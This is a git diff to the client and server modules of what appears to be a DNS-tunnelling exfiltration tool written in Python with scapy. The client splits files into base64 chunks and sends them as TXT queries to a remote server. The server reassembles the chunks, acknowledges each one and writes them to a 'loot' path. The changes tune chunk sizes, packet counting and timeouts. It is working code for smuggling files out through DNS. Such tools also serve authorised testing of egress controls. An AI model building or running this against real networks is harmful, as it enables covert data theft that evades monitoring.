diff --git a/protocols/clients/dns_resolved.py b/protocols/clients/dns_resolved.py index eb2a7b5..83c9b03 100644 --- a/protocols/clients/dns_resolved.py +++ b/protocols/clients/dns_resolved.py @@ -20,28 +20,17 @@ class Client: self.protocol = "dns_resolved" self.remote_server = cli_object.ip self.max_length = 68 + self.current_total = 0 if cli_object.file is None: self.file_transfer = False self.length = 50 else: - self.length = 30 + self.length = 24 if "/" in cli_object.file: self.file_transfer = cli_object.file.split("/")[-1] else: self.file_transfer = cli_object.file - def dns_encode(outgoing_data): - # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform - for i in range(0, len(outgoing_data), 0xff+1): - outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] - return outgoing_data - - def randomKey(b=20): - """ - Returns a random string/key of "b" characters in length, defaults to 32 - """ - return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(b)) - def transmit(self, data_to_transmit): byte_reader = 0 @@ -78,22 +67,34 @@ class Client: encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length]) encoded_data = encoded_data + "." + self.remote_server + # calcalate total packets + if (((len(data_to_transmit) - byte_reader) % self.length) == 0): + packet_diff = (len(data_to_transmit) - byte_reader) / self.length + else: + packet_diff = ((len(data_to_transmit) - byte_reader) / self.length) + while len(encoded_data) > self.max_length: self.length -= 1 # calcalate total packets if (((len(data_to_transmit) - byte_reader) % self.length) == 0): - packet_diff = (len(data_to_transmit) - byte_reader) / self.length + packet_diff2 = (len(data_to_transmit) - byte_reader) / self.length else: - packet_diff = ((len(data_to_transmit) - byte_reader) / self.length) + packet_diff2 = ((len(data_to_transmit) - byte_reader) / self.length) check_total = True encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length]) encoded_data = encoded_data + "." + self.remote_server if check_total: - self.current_total = packet_number + packet_diff + self.current_total = packet_number + packet_diff2 check_total = False + else: + if self.current_total == 0: + self.current_total = packet_diff + else: + pass + print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(self.current_total) # Craft the packet with scapy @@ -103,10 +104,10 @@ class Client: if '=' in encoded_data: encoded_data = encoded_data.replace('=', '-pqp-') - response_packet = sr1(IP(dst=nameserver)/UDP()/DNS( + response_packet = sr1(IP(dst=nameserver, ttl=10)/UDP()/DNS( rd=1, id=15, opcode=0, qd=[DNSQR(qname=encoded_data, qtype="TXT")], aa=1, qr=0), - verbose=False, timeout=2) + verbose=False, timeout=8) if response_packet: if response_packet.haslayer(DNSRR): diff --git a/protocols/servers/dns_resolved.py b/protocols/servers/dns_resolved.py index b0173c4..e3b44c4 100644 --- a/protocols/servers/dns_resolved.py +++ b/protocols/servers/dns_resolved.py @@ -16,7 +16,6 @@ class Server: def __init__(self, cli_object): self.protocol = "dns_resolved" - self.last_packet = '' self.file_name = '' self.loot_path = '' self.file_dict = {} @@ -42,24 +41,26 @@ class Server: incoming_data = base64.b64decode(string_to_decode) if ".:|:." in incoming_data: self.file_status = incoming_data.split('.:|:.')[0] - file_data = incoming_data.split('.:|:.')[1] - self.file_dict[self.file_status] = file_data + if self.file_status in self.file_dict: + pass + else: + file_data = incoming_data.split('.:|:.')[1] + self.file_dict[self.file_status] = file_data - outgoing_data = self.file_status + "allgoodhere" + outgoing_data = self.file_status + "allgoodhere" - # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform - for i in range(0, len(outgoing_data), 0xff+1): - outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] + # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform + for i in range(0, len(outgoing_data), 0xff+1): + outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] - send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1, - qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)], - an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]), - verbose=False) + send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1, + qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)], + an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]), + verbose=False) else: with open(self.loot_path + self.file_name, 'a') as dns_out: dns_out.write(encoded_data) - self.last_packet = encoded_data except TypeError: pass